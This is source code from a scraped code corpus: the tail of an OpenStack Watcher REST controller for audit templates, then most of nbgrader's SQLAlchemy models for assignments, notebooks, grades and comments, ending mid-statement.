at_collection = AuditTemplateCollection()
at_collection.audit_templates = [
AuditTemplate.convert_with_links(p, expand)
for p in rpc_audit_templates]
at_collection.next = at_collection.get_next(limit, url=url, **kwargs)
return at_collection
@classmethod
def sample(cls):
sample = cls()
sample.audit_templates = [AuditTemplate.sample(expand=False)]
return sample
class AuditTemplatesController(rest.RestController):
"""REST controller for AuditTemplates."""
def __init__(self):
super(AuditTemplatesController, self).__init__()
from_audit_templates = False
"""A flag to indicate if the requests to this controller are coming
from the top-level resource AuditTemplates."""
_custom_actions = {
'detail': ['GET'],
}
def _get_audit_templates_collection(self, filters, marker, limit,
sort_key, sort_dir, expand=False,
resource_url=None):
additional_fields = ["goal_uuid", "goal_name", "strategy_uuid",
"strategy_name"]
api_utils.validate_sort_key(
sort_key, list(objects.AuditTemplate.fields) + additional_fields)
api_utils.validate_search_filters(
filters, list(objects.AuditTemplate.fields) + additional_fields)
limit = api_utils.validate_limit(limit)
api_utils.validate_sort_dir(sort_dir)
marker_obj = None
if marker:
marker_obj = objects.AuditTemplate.get_by_uuid(
pecan.request.context,
marker)
need_api_sort = api_utils.check_need_api_sort(sort_key,
additional_fields)
sort_db_key = (sort_key if not need_api_sort
else None)
audit_templates = objects.AuditTemplate.list(
pecan.request.context, filters, limit, marker_obj,
sort_key=sort_db_key, sort_dir=sort_dir)
audit_templates_collection = \
AuditTemplateCollection.convert_with_links(
audit_templates, limit, url=resource_url, expand=expand,
sort_key=sort_key, sort_dir=sort_dir)
if need_api_sort:
api_utils.make_api_sort(
audit_templates_collection.audit_templates, sort_key,
sort_dir)
return audit_templates_collection
@wsme_pecan.wsexpose(AuditTemplateCollection, wtypes.text, wtypes.text,
types.uuid, int, wtypes.text, wtypes.text)
def get_all(self, goal=None, strategy=None, marker=None,
limit=None, sort_key='id', sort_dir='asc'):
"""Retrieve a list of audit templates.
:param goal: goal UUID or name to filter by
:param strategy: strategy UUID or name to filter by
:param marker: pagination marker for large data sets.
:param limit: maximum number of resources to return in a single result.
:param sort_key: column to sort results by. Default: id.
:param sort_dir: direction to sort. "asc" or "desc". Default: asc.
"""
context = pecan.request.context
policy.enforce(context, 'audit_template:get_all',
action='audit_template:get_all')
filters = {}
if goal:
if common_utils.is_uuid_like(goal):
filters['goal_uuid'] = goal
else:
filters['goal_name'] = goal
if strategy:
if common_utils.is_uuid_like(strategy):
filters['strategy_uuid'] = strategy
else:
filters['strategy_name'] = strategy
return self._get_audit_templates_collection(
filters, marker, limit, sort_key, sort_dir)
@wsme_pecan.wsexpose(AuditTemplateCollection, wtypes.text, wtypes.text,
types.uuid, int, wtypes.text, wtypes.text)
def detail(self, goal=None, strategy=None, marker=None,
limit=None, sort_key='id', sort_dir='asc'):
"""Retrieve a list of audit templates with detail.
:param goal: goal UUID or name to filter by
:param strategy: strategy UUID or name to filter by
:param marker: pagination marker for large data sets.
:param limit: maximum number of resources to return in a single result.
:param sort_key: column to sort results by. Default: id.
:param sort_dir: direction to sort. "asc" or "desc". Default: asc.
"""
context = pecan.request.context
policy.enforce(context, 'audit_template:detail',
action='audit_template:detail')
        # NOTE(lucasagomes): /detail should only work against collections
parent = pecan.request.path.split('/')[:-1][-1]
if parent != "audit_templates":
raise exception.HTTPNotFound
filters = {}
if goal:
if common_utils.is_uuid_like(goal):
filters['goal_uuid'] = goal
else:
filters['goal_name'] = goal
if strategy:
if common_utils.is_uuid_like(strategy):
filters['strategy_uuid'] = strategy
else:
filters['strategy_name'] = strategy
expand = True
resource_url = '/'.join(['audit_templates', 'detail'])
return self._get_audit_templates_collection(filters, marker, limit,
sort_key, sort_dir, expand,
resource_url)
@wsme_pecan.wsexpose(AuditTemplate, wtypes.text)
def get_one(self, audit_template):
"""Retrieve information about the given audit template.
:param audit_template: UUID or name of an audit template.
"""
if self.from_audit_templates:
raise exception.OperationNotPermitted
context = pecan.request.context
rpc_audit_template = api_utils.get_resource('AuditTemplate',
audit_template)
policy.enforce(context, 'audit_template:get', rpc_audit_template,
action='audit_template:get')
return AuditTemplate.convert_with_links(rpc_audit_template)
@wsme.validate(types.uuid, AuditTemplatePostType)
@wsme_pecan.wsexpose(AuditTemplate, body=AuditTemplatePostType,
status_code=201)
def post(self, audit_template_postdata):
"""Create a new audit template.
:param audit_template_postdata: the audit template POST data
from the request body.
"""
if self.from_audit_templates:
raise exception.OperationNotPermitted
context = pecan.request.context
policy.enforce(context, 'audit_template:create',
action='audit_template:create')
audit_template = audit_template_postdata.as_audit_template()
audit_template_dict = audit_template.as_dict()
new_audit_template = objects.AuditTemplate(context,
**audit_template_dict)
new_audit_template.create()
# Set the HTTP Location Header
pecan.response.location = link.build_url(
'audit_templates', new_audit_template.uuid)
return AuditTemplate.convert_with_links(new_audit_template)
@wsme.validate(types.uuid, [AuditTemplatePatchType])
@wsme_pecan.wsexpose(AuditTemplate, wtypes.text,
body=[AuditTemplatePatchType])
def patch(self, audit_template, patch):
"""Update an existing audit template.
        :param audit_template: UUID or name of an audit template.
:param patch: a json PATCH document to apply to this audit template.
"""
if self.from_audit_templates:
raise exception.OperationNotPermitted
context = pecan.request.context
audit_template_to_update = api_utils.get_resource('AuditTemplate',
audit_template)
policy.enforce(context, 'audit_template:update',
audit_template_to_update,
action='audit_template:update')
if common_utils.is_uuid_like(audit_template):
audit_template_to_update = objects.AuditTemplate.get_by_uuid(
pecan.request.context,
audit_template)
else:
audit_template_to_update = objects.AuditTemplate.get_by_name(
pecan.request.context,
audit_template)
try:
audit_template_dict = audit_template_to_update.as_dict()
audit_template = AuditTemplate(**api_utils.apply_jsonpatch(
audit_template_dict, patch))
except api_utils.JSONPATCH_EXCEPTIONS as e:
raise exception.PatchError(patch=patch, reason=e)
# Update only the fields that have changed
for field in objects.AuditTemplate.fields:
try:
patch_val = getattr(audit_template, field)
except AttributeError:
# Ignore fields that aren't exposed in the API
continue
if patch_val == wtypes.Unset:
patch_val = None
if audit_template_to_update[field] != patch_val:
audit_template_to_update[field] = patch_val
audit_template_to_update.save()
return AuditTemplate.convert_with_links(audit_template_to_update)
@wsme_pecan.wsexpose(None, wtypes.text, status_code=204)
def delete(self, audit_template):
"""Delete a audit template.
:param template_uuid: UUID or name of an audit template.
"""
context = pecan.request.context
audit_template_to_delete = api_utils.get_resource('AuditTemplate',
audit_template)
policy.enforce(context, 'audit_template:delete',
audit_template_to_delete,
action='audit_template:delete')
audit_template_to_delete.soft_delete()
| apache-2.0 | 1,051,578,209,060,174,100 | 38.357746 | 79 | 0.596228 | false | 4.289179 | false | false | false |
alope107/nbgrader | nbgrader/api.py | 4 | 81499 | from __future__ import division
from nbgrader import utils
from sqlalchemy import (create_engine, ForeignKey, Column, String, Text,
DateTime, Interval, Float, Enum, UniqueConstraint, Boolean)
from sqlalchemy.orm import sessionmaker, scoped_session, relationship, column_property
from sqlalchemy.orm.exc import NoResultFound, FlushError
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.exc import IntegrityError
from sqlalchemy.sql import and_
from sqlalchemy import select, func, exists, case, literal_column
from uuid import uuid4
Base = declarative_base()
class InvalidEntry(ValueError):
pass
class MissingEntry(ValueError):
pass
def new_uuid():
return uuid4().hex
class Assignment(Base):
"""Database representation of the master/source version of an assignment."""
__tablename__ = "assignment"
#: Unique id of the assignment (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique human-readable name for the assignment, such as "Problem Set 1"
name = Column(String(128), unique=True, nullable=False)
#: (Optional) Duedate for the assignment in datetime format, with UTC timezone
duedate = Column(DateTime())
#: A collection of notebooks contained in this assignment, represented
#: by :class:`~nbgrader.api.Notebook` objects
notebooks = relationship("Notebook", backref="assignment", order_by="Notebook.name")
#: A collection of submissions of this assignment, represented by
#: :class:`~nbgrader.api.SubmittedAssignment` objects.
submissions = relationship("SubmittedAssignment", backref="assignment")
#: The number of submissions of this assignment
num_submissions = None
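    # NOTE: attributes set to ``None`` in this class body (and in the other
    # models below) are placeholders; they are filled in either by relationship
    # backrefs or by the ``column_property`` definitions at the bottom of this
    # module.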
#: Maximum score achievable on this assignment, automatically calculated
#: from the :attr:`~nbgrader.api.Notebook.max_score` of each notebook
max_score = None
#: Maximum coding score achievable on this assignment, automatically
#: calculated from the :attr:`~nbgrader.api.Notebook.max_code_score` of
#: each notebook
max_code_score = None
#: Maximum written score achievable on this assignment, automatically
#: calculated from the :attr:`~nbgrader.api.Notebook.max_written_score` of
#: each notebook
max_written_score = None
def to_dict(self):
"""Convert the assignment object to a JSON-friendly dictionary
representation.
"""
return {
"id": self.id,
"name": self.name,
"duedate": self.duedate.isoformat() if self.duedate is not None else None,
"num_submissions": self.num_submissions,
"max_score": self.max_score,
"max_code_score": self.max_code_score,
"max_written_score": self.max_written_score,
}
def __repr__(self):
return "Assignment<{}>".format(self.name)
class Notebook(Base):
"""Database representation of the master/source version of a notebook."""
__tablename__ = "notebook"
__table_args__ = (UniqueConstraint('name', 'assignment_id'),)
#: Unique id of the notebook (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique human-readable name for the notebook, such as "Problem 1". Note
#: the uniqueness is only constrained within assignments (e.g. it is ok for
#: two different assignments to both have notebooks called "Problem 1", but
#: the same assignment cannot have two notebooks with the same name).
name = Column(String(128), nullable=False)
#: The :class:`~nbgrader.api.Assignment` object that this notebook is a
#: part of
assignment = None
#: Unique id of :attr:`~nbgrader.api.Notebook.assignment`
assignment_id = Column(String(32), ForeignKey('assignment.id'))
#: A collection of grade cells contained within this notebook, represented
#: by :class:`~nbgrader.api.GradeCell` objects
grade_cells = relationship("GradeCell", backref="notebook")
#: A collection of solution cells contained within this notebook, represented
#: by :class:`~nbgrader.api.SolutionCell` objects
solution_cells = relationship("SolutionCell", backref="notebook")
#: A collection of source cells contained within this notebook, represented
#: by :class:`~nbgrader.api.SourceCell` objects
source_cells = relationship("SourceCell", backref="notebook")
#: A collection of submitted versions of this notebook, represented by
#: :class:`~nbgrader.api.SubmittedNotebook` objects
submissions = relationship("SubmittedNotebook", backref="notebook")
#: The number of submissions of this notebook
num_submissions = None
#: Maximum score achievable on this notebook, automatically calculated
#: from the :attr:`~nbgrader.api.GradeCell.max_score` of each grade cell
max_score = None
#: Maximum coding score achievable on this notebook, automatically
#: calculated from the :attr:`~nbgrader.api.GradeCell.max_score` and
#: :attr:`~nbgrader.api.GradeCell.cell_type` of each grade cell
max_code_score = None
#: Maximum written score achievable on this notebook, automatically
#: calculated from the :attr:`~nbgrader.api.GradeCell.max_score` and
#: :attr:`~nbgrader.api.GradeCell.cell_type` of each grade cell
max_written_score = None
#: Whether there are any submitted versions of this notebook that need to
#: be manually graded, automatically determined from the
#: :attr:`~nbgrader.api.SubmittedNotebook.needs_manual_grade` attribute of
#: each submitted notebook
needs_manual_grade = None
def to_dict(self):
"""Convert the notebook object to a JSON-friendly dictionary
representation.
"""
return {
"id": self.id,
"name": self.name,
"num_submissions": self.num_submissions,
"max_score": self.max_score,
"max_code_score": self.max_code_score,
"max_written_score": self.max_written_score,
"needs_manual_grade": self.needs_manual_grade
}
def __repr__(self):
return "Notebook<{}/{}>".format(self.assignment.name, self.name)
class GradeCell(Base):
"""Database representation of the master/source version of a grade cell."""
__tablename__ = "grade_cell"
__table_args__ = (UniqueConstraint('name', 'notebook_id'),)
#: Unique id of the grade cell (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique human-readable name of the grade cell. This need only be unique
#: within the notebook, not across notebooks.
name = Column(String(128), nullable=False)
#: Maximum score that can be assigned to this grade cell
max_score = Column(Float(), nullable=False)
#: The cell type, either "code" or "markdown"
cell_type = Column(Enum("code", "markdown"), nullable=False)
#: The :class:`~nbgrader.api.Notebook` that this grade cell is contained in
notebook = None
#: Unique id of the :attr:`~nbgrader.api.GradeCell.notebook`
notebook_id = Column(String(32), ForeignKey('notebook.id'))
#: The assignment that this cell is contained within, represented by a
#: :class:`~nbgrader.api.Assignment` object
assignment = association_proxy("notebook", "assignment")
#: A collection of grades assigned to submitted versions of this grade cell,
#: represented by :class:`~nbgrader.api.Grade` objects
grades = relationship("Grade", backref="cell")
def to_dict(self):
"""Convert the grade cell object to a JSON-friendly dictionary
representation. Note that this includes keys for ``notebook`` and
``assignment`` which correspond to the names of the notebook and
assignment, not the objects themselves.
"""
return {
"id": self.id,
"name": self.name,
"max_score": self.max_score,
"cell_type": self.cell_type,
"notebook": self.notebook.name,
"assignment": self.assignment.name
}
def __repr__(self):
return "GradeCell<{}/{}/{}>".format(
self.assignment.name, self.notebook.name, self.name)
class SolutionCell(Base):
__tablename__ = "solution_cell"
__table_args__ = (UniqueConstraint('name', 'notebook_id'),)
#: Unique id of the solution cell (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique human-readable name of the solution cell. This need only be unique
#: within the notebook, not across notebooks.
name = Column(String(128), nullable=False)
#: The :class:`~nbgrader.api.Notebook` that this solution cell is contained in
notebook = None
#: Unique id of the :attr:`~nbgrader.api.SolutionCell.notebook`
notebook_id = Column(String(32), ForeignKey('notebook.id'))
#: The assignment that this cell is contained within, represented by a
#: :class:`~nbgrader.api.Assignment` object
assignment = association_proxy("notebook", "assignment")
#: A collection of comments assigned to submitted versions of this grade cell,
#: represented by :class:`~nbgrader.api.Comment` objects
comments = relationship("Comment", backref="cell")
def to_dict(self):
"""Convert the solution cell object to a JSON-friendly dictionary
representation. Note that this includes keys for ``notebook`` and
``assignment`` which correspond to the names of the notebook and
assignment, not the objects themselves.
"""
return {
"id": self.id,
"name": self.name,
"notebook": self.notebook.name,
"assignment": self.assignment.name
}
def __repr__(self):
return "{}/{}".format(self.notebook, self.name)
class SourceCell(Base):
__tablename__ = "source_cell"
__table_args__ = (UniqueConstraint('name', 'notebook_id'),)
#: Unique id of the source cell (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique human-readable name of the source cell. This need only be unique
#: within the notebook, not across notebooks.
name = Column(String(128), nullable=False)
#: The cell type, either "code" or "markdown"
cell_type = Column(Enum("code", "markdown"), nullable=False)
#: Whether the cell is locked (e.g. the source saved in the database should
#: be used to overwrite the source of students' cells)
locked = Column(Boolean, default=False, nullable=False)
#: The source code or text of the cell
source = Column(Text())
#: A checksum of the cell contents. This should usually be computed
#: using :func:`nbgrader.utils.compute_checksum`
checksum = Column(String(128))
#: The :class:`~nbgrader.api.Notebook` that this source cell is contained in
notebook = None
#: Unique id of the :attr:`~nbgrader.api.SourceCell.notebook`
notebook_id = Column(String(32), ForeignKey('notebook.id'))
#: The assignment that this cell is contained within, represented by a
#: :class:`~nbgrader.api.Assignment` object
assignment = association_proxy("notebook", "assignment")
def to_dict(self):
"""Convert the source cell object to a JSON-friendly dictionary
representation. Note that this includes keys for ``notebook`` and
``assignment`` which correspond to the names of the notebook and
assignment, not the objects themselves.
"""
return {
"id": self.id,
"name": self.name,
"cell_type": self.cell_type,
"locked": self.locked,
"source": self.source,
"checksum": self.checksum,
"notebook": self.notebook.name,
"assignment": self.assignment.name
}
def __repr__(self):
return "SolutionCell<{}/{}/{}>".format(
self.assignment.name, self.notebook.name, self.name)
class Student(Base):
"""Database representation of a student."""
__tablename__ = "student"
#: Unique id of the student. This could be a student ID, a username, an
#: email address, etc., so long as it is unique.
id = Column(String(128), primary_key=True, nullable=False)
#: (Optional) The first name of the student
first_name = Column(String(128))
#: (Optional) The last name of the student
last_name = Column(String(128))
#: (Optional) The student's email address, if the :attr:`~nbgrader.api.Student.id`
#: does not correspond to an email address
email = Column(String(128))
#: A collection of assignments submitted by the student, represented as
#: :class:`~nbgrader.api.SubmittedAssignment` objects
submissions = relationship("SubmittedAssignment", backref="student")
#: The overall score of the student across all assignments, computed
#: automatically from the :attr:`~nbgrader.api.SubmittedAssignment.score`
#: of each submitted assignment.
score = None
#: The maximum possible score the student could achieve across all assignments,
#: computed automatically from the :attr:`~nbgrader.api.Assignment.max_score`
#: of each assignment.
max_score = None
def to_dict(self):
"""Convert the student object to a JSON-friendly dictionary
representation.
"""
return {
"id": self.id,
"first_name": self.first_name,
"last_name": self.last_name,
"email": self.email,
"score": self.score,
"max_score": self.max_score
}
def __repr__(self):
return "Student<{}>".format(self.id)
class SubmittedAssignment(Base):
"""Database representation of an assignment submitted by a student."""
__tablename__ = "submitted_assignment"
__table_args__ = (UniqueConstraint('assignment_id', 'student_id'),)
#: Unique id of the submitted assignment (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Name of the assignment, inherited from :class:`~nbgrader.api.Assignment`
name = association_proxy("assignment", "name")
#: The master version of this assignment, represented by a
#: :class:`~nbgrader.api.Assignment` object
assignment = None
#: Unique id of :attr:`~nbgrader.api.SubmittedAssignment.assignment`
assignment_id = Column(String(32), ForeignKey('assignment.id'))
#: The student who submitted this assignment, represented by a
#: :class:`~nbgrader.api.Student` object
student = None
#: Unique id of :attr:`~nbgrader.api.SubmittedAssignment.student`
student_id = Column(String(128), ForeignKey('student.id'))
#: (Optional) The date and time that the assignment was submitted, in date
#: time format with a UTC timezone
timestamp = Column(DateTime())
#: (Optional) An extension given to the student for this assignment, in
#: time delta format
extension = Column(Interval())
#: A collection of notebooks contained within this submitted assignment,
#: represented by :class:`~nbgrader.api.SubmittedNotebook` objects
notebooks = relationship("SubmittedNotebook", backref="assignment")
#: The score assigned to this assignment, automatically calculated from the
#: :attr:`~nbgrader.api.SubmittedNotebook.score` of each notebook within
#: this submitted assignment.
score = None
#: The maximum possible score of this assignment, inherited from
#: :class:`~nbgrader.api.Assignment`
max_score = None
#: The code score assigned to this assignment, automatically calculated from
#: the :attr:`~nbgrader.api.SubmittedNotebook.code_score` of each notebook
#: within this submitted assignment.
code_score = None
#: The maximum possible code score of this assignment, inherited from
#: :class:`~nbgrader.api.Assignment`
max_code_score = None
#: The written score assigned to this assignment, automatically calculated
#: from the :attr:`~nbgrader.api.SubmittedNotebook.written_score` of each
#: notebook within this submitted assignment.
written_score = None
#: The maximum possible written score of this assignment, inherited from
#: :class:`~nbgrader.api.Assignment`
max_written_score = None
#: Whether this assignment has parts that need to be manually graded,
#: automatically determined from the :attr:`~nbgrader.api.SubmittedNotebook.needs_manual_grade`
#: attribute of each notebook.
needs_manual_grade = None
@property
def duedate(self):
"""The duedate of this student's assignment, which includes any extension
given, if applicable, and which is just the regular assignment duedate
otherwise.
"""
orig_duedate = self.assignment.duedate
if self.extension is not None:
return orig_duedate + self.extension
else:
return orig_duedate
@property
def total_seconds_late(self):
"""The number of seconds that this assignment was turned in past the
duedate (including extensions, if any). If the assignment was turned in
before the deadline, this value will just be zero.
"""
if self.timestamp is None or self.duedate is None:
return 0
else:
return max(0, (self.timestamp - self.duedate).total_seconds())
def to_dict(self):
"""Convert the submitted assignment object to a JSON-friendly dictionary
representation. Note that this includes a ``student`` key which is the
unique id of the student, not the object itself.
"""
return {
"id": self.id,
"name": self.name,
"student": self.student.id,
"timestamp": self.timestamp.isoformat() if self.timestamp is not None else None,
"extension": self.extension.total_seconds() if self.extension is not None else None,
"duedate": self.duedate.isoformat() if self.duedate is not None else None,
"total_seconds_late": self.total_seconds_late,
"score": self.score,
"max_score": self.max_score,
"code_score": self.code_score,
"max_code_score": self.max_code_score,
"written_score": self.written_score,
"max_written_score": self.max_written_score,
"needs_manual_grade": self.needs_manual_grade
}
def __repr__(self):
return "SubmittedAssignment<{} for {}>".format(self.name, self.student.id)
class SubmittedNotebook(Base):
"""Database representation of a notebook submitted by a student."""
__tablename__ = "submitted_notebook"
__table_args__ = (UniqueConstraint('notebook_id', 'assignment_id'),)
#: Unique id of the submitted notebook (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Name of the notebook, inherited from :class:`~nbgrader.api.Notebook`
name = association_proxy("notebook", "name")
#: The submitted assignment this notebook is a part of, represented by a
#: :class:`~nbgrader.api.SubmittedAssignment` object
assignment = None
#: Unique id of :attr:`~nbgrader.api.SubmittedNotebook.assignment`
assignment_id = Column(String(32), ForeignKey('submitted_assignment.id'))
    #: The master version of this notebook, represented by a
#: :class:`~nbgrader.api.Notebook` object
notebook = None
#: Unique id of :attr:`~nbgrader.api.SubmittedNotebook.notebook`
notebook_id = Column(String(32), ForeignKey('notebook.id'))
#: Collection of grades associated with this submitted notebook, represented
#: by :class:`~nbgrader.api.Grade` objects
grades = relationship("Grade", backref="notebook")
#: Collection of comments associated with this submitted notebook, represented
#: by :class:`~nbgrader.api.Comment` objects
comments = relationship("Comment", backref="notebook")
#: The student who submitted this notebook, represented by a
#: :class:`~nbgrader.api.Student` object
student = association_proxy('assignment', 'student')
#: Whether this assignment has been flagged by a human grader
flagged = Column(Boolean, default=False)
#: The score assigned to this notebook, automatically calculated from the
#: :attr:`~nbgrader.api.Grade.score` of each grade cell within
#: this submitted notebook.
score = None
#: The maximum possible score of this notebook, inherited from
#: :class:`~nbgrader.api.Notebook`
max_score = None
#: The code score assigned to this notebook, automatically calculated from
#: the :attr:`~nbgrader.api.Grade.score` and :attr:`~nbgrader.api.GradeCell.cell_type`
#: of each grade within this submitted notebook.
code_score = None
#: The maximum possible code score of this notebook, inherited from
#: :class:`~nbgrader.api.Notebook`
max_code_score = None
#: The written score assigned to this notebook, automatically calculated from
#: the :attr:`~nbgrader.api.Grade.score` and :attr:`~nbgrader.api.GradeCell.cell_type`
#: of each grade within this submitted notebook.
written_score = None
#: The maximum possible written score of this notebook, inherited from
#: :class:`~nbgrader.api.Notebook`
max_written_score = None
#: Whether this notebook has parts that need to be manually graded,
#: automatically determined from the :attr:`~nbgrader.api.Grade.needs_manual_grade`
#: attribute of each grade.
needs_manual_grade = None
#: Whether this notebook contains autograder tests that failed to pass,
#: automatically determined from the :attr:`~nbgrader.api.Grade.failed_tests`
#: attribute of each grade.
failed_tests = None
def to_dict(self):
"""Convert the submitted notebook object to a JSON-friendly dictionary
representation. Note that this includes a key for ``student`` which is
the unique id of the student, not the actual student object.
"""
return {
"id": self.id,
"name": self.name,
"student": self.student.id,
"score": self.score,
"max_score": self.max_score,
"code_score": self.code_score,
"max_code_score": self.max_code_score,
"written_score": self.written_score,
"max_written_score": self.max_written_score,
"needs_manual_grade": self.needs_manual_grade,
"failed_tests": self.failed_tests,
"flagged": self.flagged
}
def __repr__(self):
return "SubmittedNotebook<{}/{} for {}>".format(
self.assignment.name, self.name, self.student.id)
class Grade(Base):
"""Database representation of a grade assigned to the submitted version of
a grade cell.
"""
__tablename__ = "grade"
__table_args__ = (UniqueConstraint('cell_id', 'notebook_id'),)
#: Unique id of the grade (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique name of the grade cell, inherited from :class:`~nbgrader.api.GradeCell`
name = association_proxy('cell', 'name')
#: The submitted assignment that this grade is contained in, represented by
#: a :class:`~nbgrader.api.SubmittedAssignment` object
assignment = association_proxy('notebook', 'assignment')
#: The submitted notebook that this grade is assigned to, represented by a
#: :class:`~nbgrader.api.SubmittedNotebook` object
notebook = None
#: Unique id of :attr:`~nbgrader.api.Grade.notebook`
notebook_id = Column(String(32), ForeignKey('submitted_notebook.id'))
#: The master version of the cell this grade is assigned to, represented by
#: a :class:`~nbgrader.api.GradeCell` object.
cell = None
#: Unique id of :attr:`~nbgrader.api.Grade.cell`
cell_id = Column(String(32), ForeignKey('grade_cell.id'))
#: The type of cell this grade corresponds to, inherited from
#: :class:`~nbgrader.api.GradeCell`
cell_type = None
#: The student who this grade is assigned to, represented by a
#: :class:`~nbgrader.api.Student` object
student = association_proxy('notebook', 'student')
#: Score assigned by the autograder
auto_score = Column(Float())
#: Score assigned by a human grader
manual_score = Column(Float())
#: Whether a score needs to be assigned manually. This is True by default.
needs_manual_grade = Column(Boolean, default=True, nullable=False)
#: The overall score, computed automatically from the
#: :attr:`~nbgrader.api.Grade.auto_score` and :attr:`~nbgrader.api.Grade.manual_score`
#: values. If neither are set, the score is zero. If both are set, then the
#: manual score takes precedence. If only one is set, then that value is used
#: for the score.
score = column_property(case(
[
(manual_score != None, manual_score),
(auto_score != None, auto_score)
],
else_=literal_column("0.0")
))
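    # Illustrative behaviour of the expression above: auto_score=3 with no
    # manual_score gives a score of 3; once manual_score=5 is set the score
    # becomes 5; with neither set the score falls back to 0.0.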
#: The maximum possible score that can be assigned, inherited from
#: :class:`~nbgrader.api.GradeCell`
max_score = None
#: Whether the autograded score is a result of failed autograder tests. This
#: is True if the autograder score is zero and the cell type is "code", and
#: otherwise False.
failed_tests = None
def to_dict(self):
"""Convert the grade object to a JSON-friendly dictionary representation.
Note that this includes keys for ``notebook`` and ``assignment`` which
correspond to the name of the notebook and assignment, not the actual
objects. It also includes a key for ``student`` which corresponds to the
unique id of the student, not the actual student object.
"""
return {
"id": self.id,
"name": self.name,
"notebook": self.notebook.name,
"assignment": self.assignment.name,
"student": self.student.id,
"auto_score": self.auto_score,
"manual_score": self.manual_score,
"max_score": self.max_score,
"needs_manual_grade": self.needs_manual_grade,
"failed_tests": self.failed_tests,
"cell_type": self.cell_type
}
def __repr__(self):
return "Grade<{}/{}/{} for {}>".format(
self.assignment.name, self.notebook.name, self.name, self.student.id)
class Comment(Base):
"""Database representation of a comment on a cell in a submitted notebook."""
__tablename__ = "comment"
__table_args__ = (UniqueConstraint('cell_id', 'notebook_id'),)
#: Unique id of the comment (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique name of the solution cell, inherited from :class:`~nbgrader.api.SolutionCell`
name = association_proxy('cell', 'name')
#: The submitted assignment that this comment is contained in, represented by
#: a :class:`~nbgrader.api.SubmittedAssignment` object
assignment = association_proxy('notebook', 'assignment')
#: The submitted notebook that this comment is assigned to, represented by a
#: :class:`~nbgrader.api.SubmittedNotebook` object
notebook = None
#: Unique id of :attr:`~nbgrader.api.Comment.notebook`
notebook_id = Column(String(32), ForeignKey('submitted_notebook.id'))
#: The master version of the cell this comment is assigned to, represented by
#: a :class:`~nbgrader.api.SolutionCell` object.
cell = None
#: Unique id of :attr:`~nbgrader.api.Comment.cell`
cell_id = Column(String(32), ForeignKey('solution_cell.id'))
#: The student who this comment is assigned to, represented by a
#: :class:`~nbgrader.api.Student` object
student = association_proxy('notebook', 'student')
#: A comment which is automatically assigned by the autograder
auto_comment = Column(Text())
    #: A comment which is assigned manually
manual_comment = Column(Text())
#: The overall comment, computed automatically from the
#: :attr:`~nbgrader.api.Comment.auto_comment` and
#: :attr:`~nbgrader.api.Comment.manual_comment` values. If neither are set,
#: the comment is None. If both are set, then the manual comment
#: takes precedence. If only one is set, then that value is used for the
#: comment.
comment = column_property(case(
[
(manual_comment != None, manual_comment),
(auto_comment != None, auto_comment)
],
else_=None
))
def to_dict(self):
"""Convert the comment object to a JSON-friendly dictionary representation.
Note that this includes keys for ``notebook`` and ``assignment`` which
correspond to the name of the notebook and assignment, not the actual
objects. It also includes a key for ``student`` which corresponds to the
unique id of the student, not the actual student object.
"""
return {
"id": self.id,
"name": self.name,
"notebook": self.notebook.name,
"assignment": self.assignment.name,
"student": self.student.id,
"auto_comment": self.auto_comment,
"manual_comment": self.manual_comment
}
def __repr__(self):
return "Comment<{}/{}/{} for {}>".format(
self.assignment.name, self.notebook.name, self.name, self.student.id)
## Needs manual grade
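# Each property below is an EXISTS subquery: a submitted notebook needs manual
# grading if any of its grades does, a submitted assignment if any grade in any
# of its notebooks does, and a master notebook if any submitted copy does.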
SubmittedNotebook.needs_manual_grade = column_property(
exists().where(and_(
Grade.notebook_id == SubmittedNotebook.id,
Grade.needs_manual_grade))\
.correlate_except(Grade), deferred=True)
SubmittedAssignment.needs_manual_grade = column_property(
exists().where(and_(
SubmittedNotebook.assignment_id == SubmittedAssignment.id,
Grade.notebook_id == SubmittedNotebook.id,
Grade.needs_manual_grade))\
.correlate_except(Grade), deferred=True)
Notebook.needs_manual_grade = column_property(
exists().where(and_(
Notebook.id == SubmittedNotebook.notebook_id,
Grade.notebook_id == SubmittedNotebook.id,
Grade.needs_manual_grade))\
.correlate_except(Grade), deferred=True)
## Overall scores
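# Scores are summed over the matching Grade rows; coalesce(..., 0.0) keeps the
# result at 0.0 (rather than NULL) when no grades exist yet.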
SubmittedNotebook.score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(Grade.notebook_id == SubmittedNotebook.id)\
.correlate_except(Grade), deferred=True)
SubmittedAssignment.score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
SubmittedNotebook.assignment_id == SubmittedAssignment.id,
Grade.notebook_id == SubmittedNotebook.id))\
.correlate_except(Grade), deferred=True)
Student.score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
SubmittedAssignment.student_id == Student.id,
SubmittedNotebook.assignment_id == SubmittedAssignment.id,
Grade.notebook_id == SubmittedNotebook.id))\
.correlate_except(Grade), deferred=True)
## Overall max scores
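# Max scores are summed from the master GradeCell definitions rather than from
# Grade rows, so they are well-defined even before any submissions exist.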
Grade.max_score = column_property(
select([GradeCell.max_score])\
.where(Grade.cell_id == GradeCell.id)\
.correlate_except(GradeCell), deferred=True)
Notebook.max_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(GradeCell.notebook_id == Notebook.id)\
.correlate_except(GradeCell), deferred=True)
SubmittedNotebook.max_score = column_property(
select([Notebook.max_score])\
.where(SubmittedNotebook.notebook_id == Notebook.id)\
.correlate_except(Notebook), deferred=True)
Assignment.max_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(and_(
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id))\
.correlate_except(GradeCell), deferred=True)
SubmittedAssignment.max_score = column_property(
select([Assignment.max_score])\
.where(SubmittedAssignment.assignment_id == Assignment.id)\
.correlate_except(Assignment), deferred=True)
Student.max_score = column_property(
